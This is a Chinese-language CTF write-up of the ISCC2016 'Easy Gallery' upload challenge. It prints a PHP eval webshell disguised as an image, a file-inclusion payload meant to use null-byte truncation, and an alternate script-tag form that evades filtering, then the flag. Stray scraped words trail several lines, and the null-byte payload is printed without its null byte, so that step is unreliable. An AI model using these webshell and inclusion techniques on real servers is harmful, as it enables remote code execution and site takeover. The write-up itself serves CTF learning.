ISCC2016 Easy Gallery

ISCC2016 Easy Gallery

雖然是一道上傳繞過,但是繞出了新姿式,記錄一下php

打開題目發現有一個上傳文件的地方html

直接上傳圖片一句話web

一句話的內容是:spa

<?php eval($_POST['Ambrose']); ?>

上傳成功顯示圖片IDcode

 

拿着這個ID去找圖片路徑htm

 

經過查看圖片信息得知圖片在uploads/1532755715.jpg接下來就是鏈接菜刀,但是菜刀連不上,看了其餘師傅的wp多是繞過了菜刀。blog

看了wp發現這還有個文件包含圖片

構造payload:ip

?page=uploads/1532755715.jpg

 返回class

 

它會在文件後面再加上.php,因此用到00截斷

?page=uploads/1532755715.jpg

返回:

猜是過濾了一句話中的<?之類的

這裏推薦個連接:http://www.freebuf.com/articles/web/9396.html

換個方式寫一句話:

<script language="php">phpinfo();</script>

上傳:

 

 CTF{upl0ad_sh0uld_n07_b3_a110wed}

相關文章
相關標籤/搜索